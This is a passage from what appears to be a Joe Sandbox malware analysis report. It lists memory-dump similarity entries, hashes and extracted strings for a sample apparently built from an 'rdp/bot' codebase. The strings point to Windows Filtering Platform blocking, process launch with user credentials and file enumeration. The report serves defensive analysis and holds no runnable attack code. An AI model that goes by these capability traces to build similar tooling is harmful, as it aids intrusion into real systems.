                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                    • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                    • API String ID: 1522850966-2029202777
                    • Opcode ID: e01a2546dc137a85f423c8f89867c1a3d9276bb166f76ca6a144805d095920fa
                    • Instruction ID: 70c78d356ab0e195e0b1f8f4df2a2024b2839e89835fbb72e87d396dbb109e64
                    • Opcode Fuzzy Hash: e01a2546dc137a85f423c8f89867c1a3d9276bb166f76ca6a144805d095920fa
                    • Instruction Fuzzy Hash: 8251A522618F8191F7609F16FC80BAAA296FF44784F444535DA8D47B99EF3DE8A0C790
                    APIs
                    • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,00000215763F14D0,?,00007FF7048914B4,?,?,00000001,00007FF7048914D2), ref: 00007FF704899701
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Close0EngineFwpmwcscmp
                    • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                    • API String ID: 4239307310-774261742
                    • Opcode ID: bc37717aaa125da59d133c60f9123bca4d000f7470b915232312e13a07abc2cb
                    • Instruction ID: f05a82a5b7e637cf33bf63d4d08fbd5e607d8cb647c53f0532825317a0afac5a
                    • Opcode Fuzzy Hash: bc37717aaa125da59d133c60f9123bca4d000f7470b915232312e13a07abc2cb
                    • Instruction Fuzzy Hash: 8331B491B1CA4391FA51BE57ACC0ABA92519F493C0FC80835EA0E477D5EF5CFC658360
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-4111913120
                    • Opcode ID: 55f41800e1764709aa011a7321b8a8cc42a7450f45ffe44db308ed9fbd2e31db
                    • Instruction ID: f72733dde705805f3142fda4f66aabba696a3eef7c0d456766fd0351ef63c914
                    • Opcode Fuzzy Hash: 55f41800e1764709aa011a7321b8a8cc42a7450f45ffe44db308ed9fbd2e31db
                    • Instruction Fuzzy Hash: F121A451E0C84382FB646EAAACC4B7D91405F5074AFAC4D32D10EA92D8EF5CFCB55262
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: 60eb46d347e057fdabef9aa688644875f958b88ba8c0fdf82c797b715754816d
                    • Instruction ID: b59fa5feb0559220fe8e54a31fd0f5bcd9e3e284e8339723d04f85ab1ab4deeb
                    • Opcode Fuzzy Hash: 60eb46d347e057fdabef9aa688644875f958b88ba8c0fdf82c797b715754816d
                    • Instruction Fuzzy Hash: 8DF08151A0DA0382FA25AF57AC849B5A6526F04BD4FD84832DD5D0B7D4EF2CFD768320
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: 7f27e01a4b09a2fb507d16a597e75235df5eba0fadb702a3177a3972b388af36
                    • Instruction ID: 2c1dea7bf08aad973d6a31b6ba01942251d28b300e3e31394c3c10e91d97897e
                    • Opcode Fuzzy Hash: 7f27e01a4b09a2fb507d16a597e75235df5eba0fadb702a3177a3972b388af36
                    • Instruction Fuzzy Hash: 13F01751E0EA0740F9A1BF57ACC4DA0A6516F19B94B8C1C71C90D167D1EF5CB9B58320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction ID: 4f51eaf12c252f14d2e814458be1617bc15ec2ecf4b6497148fa16afbf635ced
                    • Opcode Fuzzy Hash: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction Fuzzy Hash: D1F03013B0DA0341F956AE467C80BB991412F81BA5E8D0D358D5C0A6C1AF7D7CA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction ID: 66093d1820e0408654188f5ce1ba275629a297463c1ead15727bf940c226423b
                    • Opcode Fuzzy Hash: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction Fuzzy Hash: A4F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction ID: 471b3bff0586ec136dc95a8933df64422d513b9a2d9e2133d451bacefe279388
                    • Opcode Fuzzy Hash: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction Fuzzy Hash: 62F03A13B0DA0341F956AE46BC81BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction ID: 2bf27b2ae6d6eec0c27612c2c8fc7362068cfee71c6fc820ee6dd9d7b4cc56f9
                    • Opcode Fuzzy Hash: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction Fuzzy Hash: 1BF03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction ID: b86c9df7f7d8c00c1de3fd7fae0b5c9d88931ac29f3a9f4d1ff10f1936957d94
                    • Opcode Fuzzy Hash: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction Fuzzy Hash: D9F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction ID: a595b5299544ebb49fcf8a75d1f21148fd12d68bd1de30331cc1e1ce6760566c
                    • Opcode Fuzzy Hash: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction Fuzzy Hash: 45F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D368D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: f9c19ecb0dbcd0404074f8f279659e2043fc8fa528e26d34917970762c54e7d8
                    • Instruction ID: 4fdad4b5155460b22580d3c72f4303fa82476ceb43c86d012619b91e94a204a4
                    • Opcode Fuzzy Hash: f9c19ecb0dbcd0404074f8f279659e2043fc8fa528e26d34917970762c54e7d8
                    • Instruction Fuzzy Hash: 39F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D328D5C0A7C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction ID: 66093d1820e0408654188f5ce1ba275629a297463c1ead15727bf940c226423b
                    • Opcode Fuzzy Hash: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction Fuzzy Hash: A4F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction ID: 2bf27b2ae6d6eec0c27612c2c8fc7362068cfee71c6fc820ee6dd9d7b4cc56f9
                    • Opcode Fuzzy Hash: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction Fuzzy Hash: 1BF03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction ID: b86c9df7f7d8c00c1de3fd7fae0b5c9d88931ac29f3a9f4d1ff10f1936957d94
                    • Opcode Fuzzy Hash: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction Fuzzy Hash: D9F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction ID: 471b3bff0586ec136dc95a8933df64422d513b9a2d9e2133d451bacefe279388
                    • Opcode Fuzzy Hash: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction Fuzzy Hash: 62F03A13B0DA0341F956AE46BC81BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                    • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                    • API String ID: 1842180197-3127737957
                    • Opcode ID: 2fad34b6e60e7e93003f52f53a8c878be0b46599dbd7b18018c2520e3bcecbd4
                    • Instruction ID: 28bd793a4a1bb066b7dd8ecbdd451976ec41fe2318122e41446cc32f2362734c
                    • Opcode Fuzzy Hash: 2fad34b6e60e7e93003f52f53a8c878be0b46599dbd7b18018c2520e3bcecbd4
                    • Instruction Fuzzy Hash: 16124D61A0CA4291F670AF03EC84BB9E290BF44784FC80D76D94E466D5DF7CFA659321
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    • API String ID: 4253334766-1535167640
                    • Opcode ID: 10e833dc0d3452da4785b0ad94a31546d2ee9f8e52f6881e3946f62a432c2465
                    • Instruction ID: 780ae8c0c8c13fcd75a76be85c93bd86854157bc0e565ba7c4c1af6d1138744a
                    • Opcode Fuzzy Hash: 10e833dc0d3452da4785b0ad94a31546d2ee9f8e52f6881e3946f62a432c2465
                    • Instruction Fuzzy Hash: F2613C22E0C95395FA607E5AAC84BB8D260AF08754FD80932EC5E4B2D1DF6CFC759361
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: AddressProc$HandleLibraryLoadModule
                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                    • API String ID: 384173800-4041758303
                    • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                    • Instruction ID: 63029bfb364903971032cac5a4158de6949aedef55f34424b7d2d0ad07b717b9
                    • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                    • Instruction Fuzzy Hash: 70F0A926E0AA1790F905EF13AC84864A7646F04740BC80932C94D563A4EFACA5798320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: fflushfwriteinet_addrntohl
                    • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                    • API String ID: 3255839625-58178811
                    • Opcode ID: 91eab02d4129dd6947077f69cbbd103b78071940b845cf3642cb8d3f3b67fa7f
                    • Instruction ID: 3b5ca9c28135359f1f0799911a3da1abb81741972a55a7a2b350da5a29038627
                    • Opcode Fuzzy Hash: 91eab02d4129dd6947077f69cbbd103b78071940b845cf3642cb8d3f3b67fa7f
                    • Instruction Fuzzy Hash: 5B519E3260CBC589E7309F29B8807DAB7A1EB85780F844138D6CC47BA9EB7CD495CB50
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID:
                    • API String ID: 2086374402-0
                    • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                    • Instruction ID: 3968525ee40ebe4de64c338d41631200371e0423dadede962e9a9bb2ebfc939e
                    • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                    • Instruction Fuzzy Hash: CAE02BA2718C0543FF20DE1AD880BB7A751CB9C384F944430E91DC3794EB2CE9618740
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 43cdbd8a1772982e1159f987e7582aee2234c2e3b90ba2fecf474b6389da8852
                    • Instruction ID: a104ba4927eb469f8d1877c40c1a88cc3de74942c05c89e30cd43e6cf209b046
                    • Opcode Fuzzy Hash: 43cdbd8a1772982e1159f987e7582aee2234c2e3b90ba2fecf474b6389da8852
                    • Instruction Fuzzy Hash: FB11C287D0DAD345F656186A0CE9BB54B805F537B8E8C0639CF3C462D29F8E78338220
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 00f425755523f90e08f9e80f8d6c7666d97432842fe783b546abaece473fadd6
                    • Instruction ID: d5c286dae81ca9e563f7ecdbd25a993e496ecc03dde66f19e249c4f7b29517e7
                    • Opcode Fuzzy Hash: 00f425755523f90e08f9e80f8d6c7666d97432842fe783b546abaece473fadd6
                    • Instruction Fuzzy Hash: 66F0A987D0CAC341FA46186A0CAA7A14B816F537B8E8C4739CF38462D26F5F7C328224
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 04e2900766d9d14cb05d71eedaab4efe8780466c1436e7a6fc7beb0f48e5108a
